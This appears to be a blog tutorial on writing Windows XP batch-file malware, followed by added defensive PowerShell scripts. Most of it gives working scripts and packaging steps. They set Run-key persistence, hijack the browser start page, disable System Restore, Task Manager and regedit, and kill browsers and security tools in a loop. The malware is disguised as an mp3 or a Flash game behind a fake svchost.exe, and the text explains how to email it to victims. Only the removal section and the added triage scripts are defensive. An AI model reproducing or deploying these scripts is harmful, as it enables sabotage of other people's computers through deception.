MAKE YOUR OWN VIRUS BY MAKING YOUR OWN BATCH FILE
It's always been this way: we fellows are the good guys who save the day fighting malware threats. But as they say, you need to think like a criminal to catch one! So we do the same. To understand how malware works, how it gains access and how it keeps control, we will write a batch-file based virus ourselves. A little programming knowledge, just enough to follow what we do, and some familiarity with the Windows registry are the prerequisites. Everything here was written on Windows XP: the paths, the tools and the Internet Explorer version all date from there, and several steps (writing into the Windows directory and under HKLM) only work because the user is an administrator, which on XP was the norm.
Batch files, recognised by their .bat extension, are plain text files containing a sequence of commands that cmd.exe runs one after another. They let you write simple programs that perform simple tasks, within the limits of the command shell. Compiled languages like BASIC, Pascal and C give far closer control of the system, but batch processing is a good place to start understanding how malware behaves.
The malware we are going to build performs a few simple tasks: it changes the desktop wallpaper, swaps the left and right mouse buttons, changes the start page of Internet Explorer (6), and adds a start-up entry so that it runs every time the system starts. That sounds trivial, but automating it so that one wrong click by the user runs every step, hidden and without any confirmation, is real work when you start from scratch.
The components of the virus will be a main executable file, disguised with an attractive icon, which on execution silently extracts a batch file and the wallpaper, then runs the batch file.
Before the code, a few basics, first on creating batch files. They aren't special files produced by some special application: they are ordinary text files written in Notepad and saved with a .bat extension. They can run simple tasks like MOVE, COPY and RENAME, moderate tasks like changing file attributes (making a file hidden, giving it the system attribute, or stripping those attributes), and more involved tasks like altering the registry without asking the user. The main drawback of a batch file is that it doesn't stay resident in memory (unless we keep it alive with a loop); it performs its commands and exits. Hence, on its own, it acts as a trigger rather than as the malicious process itself.
Now, a few batch commands. A basic knowledge of DOS helps, but you can follow along without it. Starting with a simple rename, the syntax is:
RENAME [drive:][path]filename1 filename2
Example: RENAME "C:\Documents and Settings\aijaz.txt" gyaan.dat
A path containing spaces has to be quoted, otherwise cmd treats each word as a separate argument. As the example shows, we can change the extension of a file as well. If the drive and path aren't given, the file is assumed to be in the current directory of the CMD session.
Example: RENAME aijaz.txt gyaan.dat
This looks for a file named aijaz.txt in the current directory and renames it to gyaan.dat.
Coming to the MOVE command, it moves a file from one path to another, like cut and paste. The syntax is:
MOVE [/Y | /-Y] [drive:][path]filename destination
The /Y switch lets CMD overwrite existing files without asking, which keeps the user from ever seeing a prompt.
Example: MOVE /Y C:\aijaz.txt D:\
This moves the file aijaz.txt to drive D:. If the source path isn't given, the file is assumed to be in the current directory, but the destination is mandatory.
We use the MOVE command to change the wallpaper. Once a wallpaper is set, Windows XP converts it to a bitmap and stores it under:
C:\Documents and Settings\<user name>\Local Settings\Application Data\Microsoft
But Windows may be installed on another drive, like D: or E:, and we don't know the user name, so a hard-coded path won't do. Instead we use environment variables to find the Windows drive and the user profile directory: %USERPROFILE% expands to the profile path shown above. Because the expanded path contains spaces, it has to be written in quotation marks. The command to change the wallpaper becomes:
MOVE /y Wallpaper1.bmp "%USERPROFILE%\Local Settings\Application Data\Microsoft"
This moves the wallpaper from the current directory to the location where Windows keeps the current wallpaper.
Note: keep in mind that Windows XP only uses uncompressed bitmap images as wallpaper. Whenever we set an image as wallpaper, it is converted to a bitmap and stored at the location above, in the user profile, under the name Wallpaper1.bmp, hence the file name we use. So the wallpaper we supply must already be a bitmap; an image editor like IrfanView does a good job of converting to BMP.
Once the file has been replaced, the desktop has to be told to re-read its settings for the change to show. This is done with:
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
After the batch file has run, we don't want it left on the host PC where the user could open it and read the code, which would reveal where our virus lives and which registry key we added. So we simply delete the files:
DEL /F /Q /A:SHR filename
/F forces deletion of read-only files, /Q suppresses the delete confirmation, and /A selects files by attribute (S system, H hidden, R read-only), which is needed for a file that has been marked hidden or system.
Now to editing the registry. There are two ways to add a key: write a .REG file (for instance with ECHO redirection from the batch file) and import it, or edit the registry directly from the command line with the REG command. The first method adds a few more lines to our code, so we prefer the second. The syntax to add a value is:
REG ADD KeyName /v ValueName /t DataType /d Data /f
The /f switch makes REG overwrite an existing value without asking the user. Our intention is to add a start-up entry so that our code runs every time Windows logs the user on, so the wallpaper is changed again and again, making the innocent user panic! The actual key we use is:
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v winlogon /t REG_SZ /d %windir%\force.exe /f
This writes a Run value that makes the file it points at start every time the user logs on (HKCU\...\Run is per user; the HKLM equivalent covers all users but needs administrator rights). We use %windir% so that no error occurs if Windows is installed on a different drive. The value name 'winlogon' is picked to look like a Windows component to anyone skimming the key.
The point to notice is that real malware uses exactly this technique to make sure it comes back after a reboot. So the first thing to do after killing a malicious process is to remove its start-up mechanism, or it simply returns at the next logon. Refer to the post Eradicate malware.
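To see what this Run-key persistence looks like from the defender's side, here is an added example, not code from the original post: a PowerShell script, run from an elevated prompt on the affected machine, that lists every value under the HKCU and HKLM Run/RunOnce keys and flags the tells the entry above would trip (an image outside the Windows or Program Files trees, a missing image, an unsigned image, a svchost.exe that is not in System32, or a value name that imitates a Windows process). The list of imitated names and the set of trusted roots are my assumptions, not something the post defines.

```powershell
# Added example, not from the original post: triage of the Run/RunOnce keys
# that the batch virus uses for persistence. PowerShell 3.0 or later, elevated
# (HKLM and the signature check need it).

$autostartKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)

# Assumption: a legitimate autostart binary normally lives under one of these.
$trustedRoots = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)}) |
    Where-Object { $_ }

# Assumption: value names chosen to blend in with Windows components.
$imitatedNames = '^(winlogon|svchost|csrss|lsass|explorer|services)$'

function Get-ImagePath {
    param([string]$Command)
    # Take the quoted path if there is one, else the first token, then expand %VAR%.
    if ($Command -match '^\s*"([^"]+)"') { $path = $Matches[1] }
    else { $path = ($Command.Trim() -split '\s+')[0] }
    [Environment]::ExpandEnvironmentVariables($path)
}

function Get-AutostartTriage {
    foreach ($key in $autostartKeys) {
        if (-not (Test-Path $key)) { continue }
        $item = Get-Item $key
        foreach ($name in $item.GetValueNames()) {
            $command = [string]$item.GetValue($name)
            $image   = Get-ImagePath $command
            $flags   = @()

            if ($name -match $imitatedNames) { $flags += 'value name imitates an OS process' }

            if (-not (Test-Path -LiteralPath $image)) {
                $flags += 'image not found'
            } else {
                $trusted = $trustedRoots | Where-Object { $image -like ($_ + '\*') }
                if (-not $trusted) { $flags += 'image outside Windows/Program Files' }

                # The real svchost.exe lives in System32; one in system32\config is a masquerade.
                $dir = Split-Path -Path $image -Parent
                if ((Split-Path -Path $image -Leaf) -ieq 'svchost.exe' -and
                    $dir -ine (Join-Path $env:SystemRoot 'System32')) {
                    $flags += 'svchost.exe outside System32'
                }

                $sig = Get-AuthenticodeSignature -FilePath $image
                if ($sig.Status -ne 'Valid') { $flags += "signature $($sig.Status)" }
            }

            [PSCustomObject]@{
                Key     = $key
                Name    = $name
                Command = $command
                Flags   = ($flags -join '; ')
            }
        }
    }
}

# Show only entries that tripped at least one check.
Get-AutostartTriage | Where-Object { $_.Flags } | Format-List
```

Drop the final Where-Object to see every entry. Plenty of legitimate software is unsigned or lives in odd places, so treat the output as a triage list to check against Autoruns, not as a verdict.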
Similarly, to change the start page of Internet Explorer (tested on IE 6), the registry value is:
REG ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d http://pcgyaan.wordpress.com /f
Both the key name and the value name contain a space, so both must be quoted. Since IE keeps the start page in a plain HKCU value that any program running as the user can write, it is wide open to this simple attack. I am still working on changing the start page of Mozilla Firefox.
Now, to add a little insult to injury, how about tying our victim's right arm behind his back and making him struggle with his left? We're going to swap the left and right mouse buttons, making the victim panic even more! Here is the command:
RUNDLL32.exe USER32.DLL,SwapMouseButton
Having learned a few tricks of the trade, let's put down the final batch file. Open Notepad and key in this script:
@ECHO OFF
REM IE start page: key and value name both contain a space, so both are quoted
REG ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d http://pcgyaan.wordpress.com /f
REM Per-user start-up entry pointing at the copy we plant in the Windows directory
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v winlogon /t REG_SZ /d %windir%\force.exe /f
REM Replace the cached wallpaper and make the desktop re-read it
copy /y Wallpaper1.bmp "%USERPROFILE%\Local Settings\Application Data\Microsoft"
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
RUNDLL32.exe USER32.DLL,SwapMouseButton
REM Give the running SFX the name the Run entry expects and move it into place
rename song.exe force.exe
move /y force.exe "%windir%"
REM Clean up: the extracted wallpaper first and the batch file itself last,
REM because cmd stops executing a batch file once it has been deleted
del /Q Wallpaper1.bmp
del /Q force.bat
Save the file as force.bat, with 'Save as type' set to All files so Notepad doesn't append .txt. This is the core virus file. Now pick a photo of our victim and edit it so that it annoys him the most! This can be done simply by opening the file in Notepad and mangling it, or, if you know how, by editing it in Photoshop, or with one of the photo-mangling web sites. Usually these photos are JPEG. As mentioned earlier, we need a bitmap, so convert it with an image editor, preferably IrfanView since it preserves the quality of the photo. Name the result Wallpaper1.bmp.
It's quite obvious that nobody will click a suspicious looking batch file, thanks to my previous posts! The second task is to pack our batch file and wallpaper into a single file and change its icon to disguise it, so that the user is tempted to open it. The file can be made to look like a folder, an mp3 file, a Word document or anything else. What you need is WinRAR and a tool called IconFX.
Install IconFX and run it. In the File menu, go to Extract icons, browse to shell32.dll in windows\system32, and extract and save the folder icon. You can also use IconFX's snapshot tool to capture the icon of any file into an .ico. Here we will name our packed file song and give it an mp3 icon: just take a snapshot of an mp3 file, preferably one showing the Windows Media Player icon, and save the icon somewhere.
- Install WinRAR on your PC. Select the two files, the batch file and the bitmap wallpaper, by holding Ctrl, right-click and choose Add to archive.
- In the window that opens, tick Create SFX archive.
- Go to the Advanced tab and open SFX options. Under Path to extract, select Create in the current folder. In the Setup program section, under Run after extraction, enter force.bat.
- In the Modes tab, under Silent mode, select Hide all.
- In the Update tab, under Overwrite mode, select Overwrite all files.
- In the Text and icon tab, under Customize SFX logo and icon, use Load SFX icon from the file to browse to the MP3 icon. Click OK and compress the files. You get a single .exe file with an mp3 icon; rename it song.
Note: The names force.bat and song.exe must not be changed, since the batch code refers to them by those names.
Now we have a file named song with an mp3 icon, quite innocent looking but with really naughty intentions! The problem is that if we mail it as it is, webmail like Yahoo won't accept .exe attachments, and when the victim downloads the file its extension is shown, exposing our plot. So, when mailing this virus, compress it to a plain .RAR file first. The victim extracts it, sees a file named song with an mp3 icon, and opens it out of curiosity. Our job is done!!
Malware has evolved too. It has new tricks up its sleeve and other surprises that leave you looking at the most miserable option: reinstalling Windows. With the sole motive of learning a few more of the strategies malware uses to put us in trouble, we build our own and watch it work. This builds a lot of understanding of how malware causes trouble, even preventing antivirus programs from removing it, and eventually makes us skilled enough to spot the loopholes in malware that can be exploited to get rid of it, which we do at the end of the post. Now, leaving our good intentions behind, let's put on our masks and enter the dark lab!
Last time we learned a few DOS and batch basics and did a little mischief. This time we're going to be a little more mischievous! The issue with our earlier virus was that it ran a few tasks and then terminated; this time we'll make it run continuously in a loop, causing something close to what can be called havoc!
This time we will make a virus that alters the registry to start at boot and also places restrictions that make removing it tough, as many other malware do: disable System Restore, disable registry editing, disable Task Manager, disable Run, and disable Folder Options. In short, a tough one to catch hold of manually! And the virus will stay active in memory, running a process that monitors your activity and prevents you from running any browser or IM client.
Since we have already discussed how to move around in DOS, we go straight to the goals and how we accomplish them. Our main virus will, as usual, be a single executable. This file is a decoy that tempts the victim to open it, posing as a crack or a game. When run, it launches our first batch file, which plants the main virus (another executable) in a safe location and then runs it. This is how a seemingly legitimate program does you harm; it is what is called a Trojan horse planter, or dropper. The launcher can also run a legitimate application at the end, so the victim suspects nothing about what happened in the background.
As soon as the virus is planted it is executed, and the second batch file runs: it makes start-up entries, applies restrictions and then, as planned, enters a loop that troubles you continuously. Note that the loop can either just carry out the intended task (closing all internet applications, in our case) or carry out the task and continuously re-apply the restrictions. In the latter case, unless the malicious process in memory is stopped, 'restore registry defaults' tools can't help you, and this is what newer viruses do. It is also worth mentioning that most viruses nowadays edit the registry key responsible for opening .exe files (the exefile association) as well, which leaves us helpless, since we can't run or install our trusty antivirus. We don't include that feature in our virus, since it crosses the fine line between a prank and a dirty crime.
Thus you can't see the virus file, which will be super hidden (hidden plus system attribute), and you can't restore the registry defaults either. We leave out the .exe association trick, to avoid the worst in case you run the virus on yourself...!
Having learned what we are going to do, we head to the code. Open a Notepad file and key in this code; it will be our main batch file.
force.bat code:
@ECHO OFF
REM Start-up entry pointing at the planted copy; system32\config is writable only by administrators
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v winlogon /t REG_SZ /d %windir%\system32\config\svchost.exe /f
REM Turn off System Restore (under HKLM, so again administrator rights are needed)
REG ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
REM Policy restrictions: regedit, Folder Options, Task Manager and the Run dialog
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
REM Endless loop: kill the listed image names as fast as they appear
:loop
taskkill /F /IM taskmgr.exe /IM procexp.exe /IM firefox.exe /IM chrome.exe /IM iexplore.exe /IM yahoomessenger.exe /IM autoruns.exe
goto loop
After entering the code, choose Save As and save it as force.bat with 'Save as type' set to All files. Now download Bat to Exe Converter and convert this batch file to an exe, with the options below:
- Set visibility to Invisible application.
- Set the working directory to Temporary directory.
- Set temporary files to Delete at exit.
In the Version Information tab, choose an icon file of a DLL and compile the batch file. You get an exe file with the icon of a DLL. Rename this file to svchost.exe; this name and icon are our decoy. Then set the file's attributes to hidden and system, the 'super hidden' state that Explorer doesn't show by default.
Now the virus is ready; we need a planter that launches it on the victim's PC. For this we write the launch batch file:
Launch.bat code:
@echo off
REM Plant the main virus in a directory nobody looks in, then start it
move /y svchost.exe "%windir%\system32\config\"
start "" "%windir%\system32\config\svchost.exe"
REM Run the decoy game that was extracted alongside, so the victim sees what he expected
start "" game.exe
exit
Notice that you need an application that runs after the planter, to avoid suspicion. In our case this is a small Flash game named game.exe, and we give the launcher a game icon. If you want it another way, choose an mp3 icon and change the line to:
start "" song.mp3
and include in the launcher a song that plays once it is executed.
Once coded, save it as launch.bat. Now get a small Flash game and an icon for it, and run Bat to Exe Converter. Choose the same options as before and set the icon file, but this time go to the Include tab, click Add, and add the svchost.exe made earlier and the Flash game, renamed to game.exe. Compile, and our virus is ready.
It is an innocent-looking application claiming to be a Flash game, with a game icon, which is really tempting to try. Once executed, its contents (launch.bat, svchost.exe and game.exe) are extracted to the temp folder and launch.bat is run. As programmed, launch.bat moves the main virus svchost.exe into the config folder under system32 and runs it, and at the same time starts the game extracted in the temp folder. The victim sees a game start and doesn't suspect our Trojan planter. Our planter has done its job: the main virus is in place and running.
The main virus, named svchost.exe, looks like a Windows component even in a process monitor, right down to the DLL icon. It disables Task Manager, so it can't be end-tasked. It disables Folder Options, so the victim can't make super-hidden files visible to search for it. It disables Run, so the user can't launch tools like the Group Policy Editor. It disables registry editing, so any attempt to import a .reg file is rejected. Then it enters a continuous loop that closes Internet Explorer, Chrome, Firefox and Yahoo Messenger. You can add other unwanted applications to this list, such as Process Explorer, Autoruns or Malwarebytes. Hence, complete havoc! (A loop with no delay in it also keeps one CPU core busy, which is itself a tell for anyone watching the machine.)
Now to removing such nasty viruses; at first it's trial and error. You try System Restore: it's disabled, and no restore points are available. You try Task Manager: disabled. You try restoring the registry defaults: disabled too. Process Explorer and Autoruns won't start either.
Firstly, since tools like Process Explorer and Autoruns can't be disabled through the registry (unless the .exe file association is edited, which would stop every exe from running), you rename them and then run them. The virus was matching on image name and killing whatever matched, so it can't stop the renamed image. Now, in Process Explorer, we examine each process and notice a suspicious extra svchost.exe running from the system32\config folder, which blows its cover. We kill it and delete the file. Then, in Autoruns, we remove its start-up registry entry. Now the malware is gone; only the registry alterations remain. So you turn to cmd: go to the system32 folder and run cmd.exe from there (Run is disabled, but launching from Explorer still works). The DisableRegistryTools policy only stops regedit.exe; the command-line REG tool is not covered by it, so from cmd you can reset the value that blocks registry editing:
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f
This lets you edit the registry again. Import the defaults.reg entries and that should fix the rest. Note that System Restore will have to be re-enabled manually, from the Group Policy Editor (GPEDIT.MSC).
Hence we see that even smarter viruses have loopholes that can be exploited to get rid of them.
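The renaming trick works because the loop identifies tools by image name only. The flip side for the responder is that a process should not be trusted by its name either. As an added example, not code from the post, this PowerShell snippet, run elevated, identifies each running process by the OriginalFilename embedded in its version resource and by its Authenticode signature, so a renamed procexp.exe still shows up as Process Explorer, and a 'svchost.exe' running from system32\config stands out. The .mui stripping and the System32 check are my assumptions.

```powershell
# Added example, not from the original post: identify processes by PE metadata
# and signature rather than by the image name that force.bat's taskkill loop keys on.
# PowerShell 3.0 or later, elevated; processes whose MainModule cannot be read
# (protected or higher-integrity ones) are skipped.

function Get-ProcessIdentity {
    $system32 = Join-Path $env:SystemRoot 'System32'

    foreach ($proc in (Get-Process | Where-Object { $_.Path })) {
        try {
            $info = $proc.MainModule.FileVersionInfo
        } catch {
            continue   # access denied
        }

        # Assumption: strip the .mui suffix that MUI-localised binaries carry in OriginalFilename.
        $original = ([string]$info.OriginalFilename) -replace '\.mui$', ''
        $flags = @()

        # A renamed executable keeps the OriginalFilename it was built with.
        if ($original -and ($original -ine ($proc.Name + '.exe'))) {
            $flags += "renamed from $original"
        }

        # The genuine svchost.exe lives in System32; the post plants a fake in system32\config.
        if ($proc.Name -ieq 'svchost' -and
            (Split-Path -Path $proc.Path -Parent) -ine $system32) {
            $flags += 'svchost.exe outside System32'
        }

        $sig = Get-AuthenticodeSignature -FilePath $proc.Path
        if ($sig.Status -ne 'Valid') { $flags += "signature $($sig.Status)" }

        [PSCustomObject]@{
            PID      = $proc.Id
            Name     = $proc.Name
            Path     = $proc.Path
            Original = $original
            Flags    = ($flags -join '; ')
        }
    }
}

Get-ProcessIdentity | Where-Object { $_.Flags } | Format-Table -AutoSize
```

Version resources are only as honest as whoever built the binary, so an empty or misleading OriginalFilename on a compiled batch file is not proof of anything on its own; the directory and signature checks are what actually separate the planted file from the real service host.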
Note: Booting into Safe Mode is a favourite option for many, since the Run entries aren't processed there. But viruses now alter the Userinit value (HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit) and attach themselves to it, so they start in Safe Mode too, making the attempt fruitless.
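Putting the removal steps together, here is an added PowerShell cleanup, not code from the post, that does what the walk-through above does by hand: it stops and deletes anything running from system32\config, removes the Run value that points there, deletes the policy values force.bat set (deleting a value restores the Windows default, and unlike writing 0 leaves no stale entry behind), and checks the Winlogon Userinit and Shell values that the Safe Mode note warns about. The list of policy values, the assumption that nothing legitimate runs from system32\config, and the expected Userinit and Shell defaults are mine; run it elevated.

```powershell
# Added example, not from the original post: undo what force.bat does, in the
# order the removal walk-through uses. Run from an elevated PowerShell.

$badDir = Join-Path $env:SystemRoot 'system32\config'   # where the post plants svchost.exe

# Assumption: the policy values force.bat writes. Deleting a value restores the
# Windows default; writing 0 also works but leaves a stale entry behind.
$restrictions = @(
    @{ Path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\System';   Name = 'DisableRegistryTools' },
    @{ Path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\System';   Name = 'DisableTaskMgr' },
    @{ Path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'; Name = 'NoRun' },
    @{ Path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'; Name = 'NoFolderOptions' },
    @{ Path = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'; Name = 'NoFolderOptions' },
    @{ Path = 'HKLM:\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore';  Name = 'DisableSR' }
)

# 1. Stop the resident loop first, or it re-applies the restrictions behind you.
#    Assumption: nothing legitimate runs from system32\config (it holds the registry hives),
#    so match on the directory rather than on the image name.
Get-Process | Where-Object { $_.Path -and $_.Path -like ($badDir + '\*') } | ForEach-Object {
    Write-Host "Stopping $($_.Name) (PID $($_.Id)) at $($_.Path)"
    Stop-Process -Id $_.Id -Force
}
# Delete any executable left there, whether or not it was still running.
# -Force is what lets Remove-Item take a hidden+system ('super hidden') file.
Get-ChildItem -LiteralPath $badDir -Filter *.exe -Force -ErrorAction SilentlyContinue |
    ForEach-Object {
        Write-Host "Deleting $($_.FullName)"
        Remove-Item -LiteralPath $_.FullName -Force
    }

# 2. Remove the Run value that points into that directory (match on target, not on value name).
foreach ($runKey in 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
                    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run') {
    if (-not (Test-Path $runKey)) { continue }
    $item = Get-Item $runKey
    foreach ($name in $item.GetValueNames()) {
        $target = [Environment]::ExpandEnvironmentVariables([string]$item.GetValue($name))
        if ($target -like ($badDir + '\*')) {
            Write-Host "Removing $runKey\$name -> $target"
            Remove-ItemProperty -Path $runKey -Name $name
        }
    }
}

# 3. Clear the restrictions. DisableRegistryTools only blocks regedit.exe; reg.exe and
#    the PowerShell registry provider are not covered, which is the loophole the
#    walk-through relies on.
foreach ($r in $restrictions) {
    if (-not (Test-Path $r.Path)) { continue }
    $current = Get-ItemProperty -Path $r.Path -Name $r.Name -ErrorAction SilentlyContinue
    if ($current) {
        Write-Host "Clearing $($r.Path)\$($r.Name)"
        Remove-ItemProperty -Path $r.Path -Name $r.Name
    }
}

# 4. Userinit and Shell are honoured in Safe Mode too, so check them as well.
#    Assumption: stock values are userinit.exe (with the trailing comma) and explorer.exe.
$winlogon = Get-ItemProperty 'HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon'
$expectedUserinit = (Join-Path $env:SystemRoot 'system32\userinit.exe') + ','
if ($winlogon.Userinit -ine $expectedUserinit) {
    Write-Warning "Userinit is '$($winlogon.Userinit)', expected '$expectedUserinit'"
}
if ($winlogon.Shell -ine 'explorer.exe') {
    Write-Warning "Shell is '$($winlogon.Shell)', expected 'explorer.exe'"
}
```

The script only warns about Userinit and Shell rather than rewriting them, because on a real incident you want to record what was there before you change it. Removing DisableSR clears the registry side of the System Restore block; as the post notes, you still need to confirm System Restore is switched back on afterwards.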